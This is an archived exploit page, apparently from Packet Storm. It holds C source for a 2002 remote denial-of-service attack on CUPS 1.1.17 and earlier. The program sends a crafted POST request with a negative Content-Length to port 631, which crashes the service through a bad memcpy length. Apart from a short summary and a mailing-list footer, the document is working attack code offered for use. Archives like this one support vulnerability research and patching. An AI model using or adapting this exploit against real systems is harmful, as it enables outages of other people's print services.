Cups-1.1.17 and below remote denial of service exploit. Tested against Red Hat Linux 7.0 and 7.3.
06b5099910189dc6cc9b50a2ea27515f24becd3bf3b677bd9981ee2dec92f31b/*
---------------------------------------------------------------------------
Web: http://qb0x.net Author: Gabriel A. Maggiotti
Date: December 28, 2002 E-mail: gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------
Summary
-------
This code produces a denial of service (DoS), because off negative length
in memcpy() calls. This issue is similar to the Apache HTTP Server chunking
bug that is exploitable on OpenBSD, FreeBSD, and NetBSD due to their
implementations of memcpy(). Platforms [1], [2] and [3] are all susceptible
to this vulnerability.
The following test platforms were used:
[1] - Red Hat Linux 7.0 running CUPS-1.1.14-5 (RPM)
[2] - Red Hat Linux 7.3 running CUPS-1.1.14-15 (RPM)
[3] - Red Hat Linux 7.3 running CUPS-1.1.17 (Source Install)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#define PORT 631
#define MAX 1000
char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[500]="";
char *pt=strstr(string,orig);
strncpy(buf,rep, sizeof(buf));
strncat(buf,pt+strlen(orig), sizeof(buf));
strcpy(pt,buf);
return string;
}
int main(int argc,char *argv[MAX])
{
int sockfd;
int numbytes;
int port;
char *ptr;
char POST_REQUEST[MAX] =
"POST /printers HTTP/1.1\n"
"Host: ##host\n"
"Authorization: Basic AAA\n"
"Content-Length: -1\n\n\n";
struct hostent *he;
struct sockaddr_in their_addr;
if(argc!=2)
{
fprintf(stderr,"usage:%s <hostname>\n",argv[0]);
exit(1);
}
ptr=str_replace(argv[1],"##host",POST_REQUEST);
printf("%s\n",ptr);
if((he=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname");
exit(1);
}
if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("socket"); exit(1);
}
their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(PORT);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);
if( connect(sockfd,(struct sockaddr*)&their_addr,\
sizeof(struct sockaddr))==-1)
{
perror("connect");
exit(1);
}
if( send(sockfd,ptr,strlen(POST_REQUEST),0) ==-1)
{
perror("send");
exit(0);
}
close(sockfd);
return 0;
}
/*
---------------------------------------------------------------------------
research-list@qb0x.net is dedicated to interactively researching vulnerab-
ilities, report potential or undeveloped holes in any kind of computer system.
To subscribe to research-list@qb0x.ne t send a blank email to
research-list-subscribe@qb0x.net. More help available sending an email
to research-list-help@qb0x.net.
Note: the list doesn't allow html, it will be stripped from messages.
---------------------------------------------------------------------------
*/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed